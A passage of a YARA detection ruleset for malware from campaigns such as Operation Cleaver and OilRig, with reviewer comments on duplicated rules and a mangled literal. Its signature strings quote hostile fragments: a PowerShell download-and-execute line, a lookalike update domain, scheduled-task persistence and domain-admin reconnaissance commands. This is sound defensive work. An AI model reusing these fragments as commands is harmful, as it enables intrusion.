$s3 = "WARNNING: Gateway IP can not be found" condition: all of them } rule LoggerModule { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "%s-%02d%02d%02d%02d%02d.r" $s2 = "C:\\Users\\%s\\AppData\\Cookies\\" condition: all of them } rule NetC { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "NetC.exe" wide $s2 = "Net Service" condition: all of them } rule ShellCreator2 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "ShellCreator2.Properties" $s2 = "set_IV" condition: all of them } rule SmartCopy2 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "SmartCopy2.Properties" $s2 = "ZhuFrameWork" condition: all of them } rule SynFlooder { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Unable to resolve [ %s ]. ErrorCode %d" $s2 = "your target's IP is : %s" $s3 = "Raw TCP Socket Created successfully." 
condition: all of them } rule TinyZBot { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "NetScp" wide $s2 = "TinyZBot.Properties.Resources.resources" $s3 = "Aoao WaterMark" $s4 = "Run_a_exe" $s5 = "netscp.exe" $s6 = "get_MainModule_WebReference_DefaultWS" $s7 = "remove_CheckFileMD5Completed" $s8 = "http://tempuri.org/" $s9 = "Zhoupin_Cleaver" condition: ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9) } rule antivirusdetector { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "getShadyProcess" $s2 = "getSystemAntiviruses" $s3 = "AntiVirusDetector" condition: all of them } rule csext { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "COM+ System Extentions" $s2 = "csext.exe" $s3 = "COM_Extentions_bin" condition: all of them } rule kagent { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "kill command is in last machine, going back" $s2 = "message data length in B64: %d Bytes" condition: all of them } rule mimikatzWrapper : Toolkit { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "mimikatzWrapper" $s2 = "get_mimikatz" condition: all of them } rule pvz_in { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "LAST_TIME=00/00/0000:00:00PM$" $s2 = "if %%ERRORLEVEL%% == 1 GOTO line" condition: all of them } rule pvz_out { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Network Connectivity Module" wide $s2 = "OSPPSVC" wide condition: all of them } rule wndTest { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "[Alt]" wide $s2 = "<< %s >>:" wide $s3 = "Content-Disposition: inline; comp=%s; account=%s; 
product=%d;" condition: all of them } rule zhCat { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhCat -l -h -tp 1234" $s2 = "ABC ( A Big Company )" wide condition: all of them } rule zhLookUp { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhLookUp.Properties" condition: all of them } rule zhmimikatz { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "MimikatzRunner" $s2 = "zhmimikatz" condition: all of them } rule Zh0uSh311 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Zh0uSh311" condition: all of them } rule OPCLEAVER_BackDoorLogger { meta: description = "Keylogger used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "BackDoorLogger" $s2 = "zhuAddress" condition: all of them } rule OPCLEAVER_Jasus { meta: description = "ARP cache poisoner used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "pcap_dump_open" $s2 = "Resolving IPs to poison..." $s3 = "WARNNING: Gateway IP can not be found" condition: all of them } rule OPCLEAVER_LoggerModule { meta: description = "Keylogger used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." 
score = "70" strings: $s1 = "%s-%02d%02d%02d%02d%02d.r" $s2 = "C:\\Users\\%s\\AppData\\Cookies\\" condition: all of them } rule OPCLEAVER_NetC { meta: description = "Net Crawler used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "NetC.exe" wide $s2 = "Net Service" condition: all of them } rule OPCLEAVER_ShellCreator2 { meta: description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "ShellCreator2.Properties" $s2 = "set_IV" condition: all of them } rule OPCLEAVER_SmartCopy2 { meta: description = "Malware or hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "SmartCopy2.Properties" $s2 = "ZhuFrameWork" condition: all of them } rule OPCLEAVER_SynFlooder { meta: description = "Malware or hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "Unable to resolve [ %s ]. ErrorCode %d" $s2 = "your target’s IP is : %s" $s3 = "Raw TCP Socket Created successfully." condition: all of them } rule OPCLEAVER_TinyZBot { meta: description = "Tiny Bot used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." 
score = "70" strings: $s1 = "NetScp" wide $s2 = "TinyZBot.Properties.Resources.resources" $s3 = "Aoao WaterMark" $s4 = "Run_a_exe" $s5 = "netscp.exe" $s6 = "get_MainModule_WebReference_DefaultWS" $s7 = "remove_CheckFileMD5Completed" $s8 = "http://tempuri.org/" $s9 = "Zhoupin_Cleaver" condition: (($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9) } rule OPCLEAVER_ZhoupinExploitCrew { meta: description = "Keywords used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "zhoupin exploit crew" nocase $s2 = "zhopin exploit crew" nocase
/* NOTE(review): plain-text keywords with "1 of them" — expect hits on threat reports, analyst
   notes and this rule file itself, not only on the actors' tooling; treat matches as a lead,
   not as a malware verdict. */
condition: 1 of them }
/* NOTE(review): OPCLEAVER_antivirusdetector, OPCLEAVER_csext and OPCLEAVER_kagent below (and
   OPCLEAVER_TinyZBot above) carry the same strings and conditions as the unprefixed Cylance rules
   antivirusdetector, csext, kagent and TinyZBot earlier in this section, so one sample yields two
   hits per tool. That inflates match counts and alert volume for anything keyed on rule names;
   if both sets are kept on purpose, say so here, otherwise retire one of them. */
rule OPCLEAVER_antivirusdetector { meta: description = "Hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "getShadyProcess" $s2 = "getSystemAntiviruses" $s3 = "AntiVirusDetector" condition: all of them } rule OPCLEAVER_csext { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "COM+ System Extentions" $s2 = "csext.exe" $s3 = "COM_Extentions_bin" condition: all of them } rule OPCLEAVER_kagent { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." 
score = "70" strings: $s1 = "kill command is in last machine, going back" $s2 = "message data length in B64: %d Bytes" condition: all of them } rule OPCLEAVER_mimikatzWrapper { meta: description = "Mimikatz Wrapper used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "mimikatzWrapper" $s2 = "get_mimikatz" condition: all of them } rule OPCLEAVER_pvz_in { meta: description = "Parviz tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "LAST_TIME=00/00/0000:00:00PM$" $s2 = "if %%ERRORLEVEL%% == 1 GOTO line" condition: all of them } rule OPCLEAVER_pvz_out { meta: description = "Parviz tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "Network Connectivity Module" wide $s2 = "OSPPSVC" wide condition: all of them } rule OPCLEAVER_wndTest { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "[Alt]" wide $s2 = "<< %s >>:" wide $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;" condition: all of them } rule OPCLEAVER_zhCat { meta: description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." 
score = "70" strings: $s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword $s2 = "ABC ( A Big Company )" wide fullword condition: all of them } rule OPCLEAVER_zhLookUp { meta: description = "Hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "zhLookUp.Properties" condition: all of them } rule OPCLEAVER_zhmimikatz { meta: description = "Mimikatz wrapper used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "MimikatzRunner" $s2 = "zhmimikatz" condition: all of them } rule OPCLEAVER_Parviz_Developer { meta: description = "Parviz developer known from Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Florian Roth" score = "70" strings: $s1 = "Users\\parviz\\documents\\" nocase condition: $s1 } rule OPCLEAVER_CCProxy_Config { meta: description = "CCProxy config known from Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Florian Roth" score = "70" strings: $s1 = "UserName=User-001" fullword ascii $s2 = "Web=1" fullword ascii $s3 = "Mail=1" fullword ascii $s4 = "FTP=0" fullword ascii $x1 = "IPAddressLow=78.109.194.114" fullword ascii condition: all of ($s*) or $x1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* Rule Set ----------------------------------------------------------------- */ rule OilRig_Malware_Campaign_Gen1 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34" hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e" hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f" hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996" hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da" hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4" hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1" hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777" hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e" hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281" hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353" hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51" hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2" hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39" hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d" hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9" hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579" hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b" hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0" hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa" hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471" hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064" hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff" 
hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4" hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e" strings: $x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii $x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii $x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii $s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii /* Base64 encode config */ /* $global:myhost = */ $b1 = "JGdsb2JhbDpteWhvc3QgP" ascii /* HOME="%public%\Libraries\" */ $b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii /* Set wss = CreateObject("wScript.Shell") */ $b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii /* $scriptdir = Split-Path -Parent -Path $ */ $b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii /* \x0aSet wss = CreateObject("wScript.Shell") */ $b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii /* whoami & hostname */ $b6 = "d2hvYW1pICYgaG9zdG5hb" ascii condition: ( uint16(0) == 0xcfd0 and filesize < 700KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal1 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc" strings: $x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii $x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii $x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii $x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii $s1 = "http://winodwsupdates.me" ascii condition: ( uint16(0) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them ) } rule OilRig_Malware_Campaign_Gen2 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" 
reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d" hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb" strings: $s1 = "%userprofile%\\AppData\\Local\\Microsoft\\ " fullword ascii $s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii $s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii $s4 = "') -replace '__',('DNS'+$id) | " fullword ascii $s5 = "\\upd.vbs" fullword ascii $s6 = "schtasks /create /F /sc minute /mo " fullword ascii $s7 = "') -replace '__',('HTP'+$id) | " fullword ascii $s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii $s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii condition: ( uint16(0) == 0xcfd0 and filesize < 4000KB and 2 of ($s*) ) or ( 4 of them ) } rule OilRig_Malware_Campaign_Gen3 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9" hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9" hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed" strings: $x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii $x2 = "\\Libraries\\fireueye.vbs" fullword ascii $x3 = "\\Libraries\\fireeye.vbs&" fullword wide condition: ( uint16(0) == 0xcfd0 and filesize < 100KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal2 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf" strings: $x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii 
$x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii $x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide $x4 = "mailto:Tarik.Imam@gartner.com" fullword wide $x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii $x6 = "2dy53My5vcmcvMjAw" fullword wide /* base64 encoded string 'w.w3.org/200' */ condition: ( uint16(0) == 0xcfd0 and filesize < 200KB and 1 of them ) } rule OilRig_Campaign_Reconnaissance { meta: description = "Detects Windows discovery commands - known from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c" strings: $s1 = "whoami & hostname & ipconfig /all" ascii $s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii $s3 = "net group \"domain admins\" /domain 2>&1 & " ascii condition: ( filesize < 1KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal3 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378" strings: $x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii $x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii $x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii condition: ( filesize < 10KB and 1 of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule OpClandestineWolf { meta: alert_severity = "HIGH" log = "false" author = "NDF" weight = 10 alert = true source = " https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" version = 1 date = "2015-06-23" description = "Operation Clandestine Wolf signature based on OSINT from 06.23.15" hash0 = "1a4b710621ef2e69b1f7790ae9b7a288" hash1 = "917c92e8662faf96fffb8ffe7b7c80fb" hash2 = "975b458cb80395fa32c9dda759cb3f7b" hash3 = "3ed34de8609cd274e49bbd795f21acc4" hash4 = "b1a55ec420dd6d24ff9e762c7b753868" hash5 = "afd753a42036000ad476dcd81b56b754" hash6 = "fad20abf8aa4eda0802504d806280dd7" hash7 = "ab621059de2d1c92c3e7514e4b51751a" hash8 = "510b77a4b075f09202209f989582dbea" hash9 = "d1b1abfcc2d547e1ea1a4bb82294b9a3" hash10 = "4692337bf7584f6bda464b9a76d268c1" hash11 = "7cae5757f3ba9fef0a22ca0d56188439" hash12 = "1a7ba923c6aa39cc9cb289a17599fce0" hash13 = "f86db1905b3f4447eb5728859f9057b5" hash14 = "37c6d1d3054e554e13d40ea42458ebed" hash15 = "3e7430a09a44c0d1000f76c3adc6f4fa" hash16 = "98eb249e4ddc4897b8be6fe838051af7" hash17 = "1b57a7fad852b1d686c72e96f7837b44" hash18 = "ffb84b8561e49a8db60e0001f630831f" hash19 = "98eb249e4ddc4897b8be6fe838051af7" hash20 = "dfb4025352a80c2d81b84b37ef00bcd0" hash21 = "4457e89f4aec692d8507378694e0a3ba" hash22 = "48de562acb62b469480b8e29821f33b8" hash23 = "7a7eed9f2d1807f55a9308e21d81cccd" hash24 = "6817b29e9832d8fd85dcbe4af176efb6"
/* NOTE(review): hash19 repeats hash16 (the same MD5 is listed twice), so the meta covers 24
   distinct samples, not 25. More importantly, $s1 looks like a mangled literal: the "hash$="
   fragments sit where the argument separators of a VirtualAlloc(...) call would be, and text in
   that form is unlikely to occur in a real sample. With "all of them" as the condition, a
   never-matching $s1 turns the whole rule into a no-op; confirm the literal against the FireEye
   write-up in "source" before relying on this rule for detection. $s2 is the well-known
   network-adapter device class GUID and $s3 a generic Flash API name, so neither carries much
   weight on its own. */
strings: $s0 = "flash.Media.Sound()" $s1 = "call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40)" $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}" $s3 = "NetStream" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule Misdat_Backdoor_Packed { meta: author = "Cylance SPEAR Team" note = "Probably Prone to False Positive" strings: $upx = {33 2E 30 33 00 55 50 58 21} $send = {00 00 00 73 65 6E 64 00 00 00} $delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A} $shellexec = {00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 57 00 00 00} condition: filesize < 100KB and $upx and $send and $delphi_sec_pe and $shellexec } rule MiSType_Backdoor_Packed { meta: author = "Cylance SPEAR Team" note = "Probably Prone to False Positive" strings: $upx = {33 2E 30 33 00 55 50 58 21} $send_httpquery = {00 00 00 48 74 74 70 51 75 65 72 79 49 6E 66 6F 41 00 00 73 65 6E 64 00 00} $delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A} condition: filesize < 100KB and $upx and $send_httpquery and $delphi_sec_pe } rule Misdat_Backdoor { meta: author = "Cylance SPEAR Team" /* Decode Function CODE:00406C71 8B 55 F4 mov edx, [ebp+var_C] CODE:00406C74 8A 54 1A FF mov dl, [edx+ebx-1] CODE:00406C78 8B 4D F8 mov ecx, [ebp+var_8] CODE:00406C7B C1 E9 08 shr ecx, 8 CODE:00406C7E 32 D1 xor dl, cl CODE:00406C80 88 54 18 FF mov [eax+ebx-1], dl CODE:00406C84 8B 45 F4 mov eax, [ebp+var_C] CODE:00406C87 0F B6 44 18 FF movzx eax, byte ptr [eax+ebx-1] CODE:00406C8C 03 45 F8 add eax, [ebp+var_8] CODE:00406C8F 69 C0 D9 DB 00 00 imul eax, 0DBD9h CODE:00406C95 05 3B DA 00 00 add eax, 0DA3Bh CODE:00406C9A 89 45 F8 mov [ebp+var_8], eax CODE:00406C9D 43 inc ebx CODE:00406C9E 4E dec esi CODE:00406C9F 75 C9 jnz short loc_406C6A */ strings: $imul = {03 45 F8 69 C0 D9 DB 00 00 05 3B DA 00 00} $delphi = {50 45 00 00 4C 01 08 00 19 5E 42 2A} condition: $imul and $delphi } rule SType_Backdoor { meta: author = "Cylance SPEAR Team" /* Decode Function 8B 1A mov ebx, [edx] 8A 1B mov bl, [ebx] 80 EB 02 sub bl, 2 8B 74 24 08 mov esi, [esp+14h+var_C] 32 1E xor bl, [esi] 8B 31 mov esi, [ecx] 88 1E mov [esi], bl 8B 1A mov ebx, [edx] 43 inc ebx 89 1A mov [edx], ebx 8B 19 mov ebx, [ecx] 43 inc ebx 89 19 mov [ecx], ebx 48 dec eax 75 E2 jnz short 
loc_40EAC6 */ strings: $stype = "stype=info&data=" $mmid = "?mmid=" $status = "&status=run succeed" $mutex = "_KB10B2D1_CIlFD2C" $decode = {8B 1A 8A 1B 80 EB 02 8B 74 24 08 32 1E 8B 31 88 1E 8B 1A 43} condition: $stype or ($mmid and $status) or $mutex or $decode } rule Zlib_Backdoor { meta: author = "Cylance SPEAR Team" /* String C7 45 FC 00 04 00 00 mov [ebp+Memory], 400h C6 45 D8 50 mov [ebp+Str], 'P' C6 45 D9 72 mov [ebp+var_27], 'r' C6 45 DA 6F mov [ebp+var_26], 'o' C6 45 DB 78 mov [ebp+var_25], 'x' C6 45 DC 79 mov [ebp+var_24], 'y' C6 45 DD 2D mov [ebp+var_23], '-' C6 45 DE 41 mov [ebp+var_22], 'A' C6 45 DF 75 mov [ebp+var_21], 'u' C6 45 E0 74 mov [ebp+var_20], 't' C6 45 E1 68 mov [ebp+var_1F], 'h' C6 45 E2 65 mov [ebp+var_1E], 'e' C6 45 E3 6E mov [ebp+var_1D], 'n' C6 45 E4 74 mov [ebp+var_1C], 't' C6 45 E5 69 mov [ebp+var_1B], 'i' C6 45 E6 63 mov [ebp+var_1A], 'c' C6 45 E7 61 mov [ebp+var_19], 'a' C6 45 E8 74 mov [ebp+var_18], 't' C6 45 E9 65 mov [ebp+var_17], 'e' C6 45 EA 3A mov [ebp+var_16], ':' C6 45 EB 20 mov [ebp+var_15], ' ' C6 45 EC 4E mov [ebp+var_14], 'N' C6 45 ED 54 mov [ebp+var_13], 'T' C6 45 EE 4C mov [ebp+var_12], 'L' C6 45 EF 4D mov [ebp+var_11], 'M' C6 45 F0 20 mov [ebp+var_10], ' ' */ strings: $auth = {C6 45 D8 50 C6 45 D9 72 C6 45 DA 6F C6 45 DB 78 C6 45 DC 79 C6 45 DD 2D} $auth2 = {C7 45 FC 00 04 00 00 C6 45 ?? 50 C6 45 ?? 72 C6 45 ?? 6F} $ntlm = "NTLM" wide condition: ($auth or $auth2) and $ntlm } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Operation Potao yara rules // For feedback or questions contact us at: github@eset.com // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2015, ESET // All rights reserved. 
// // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
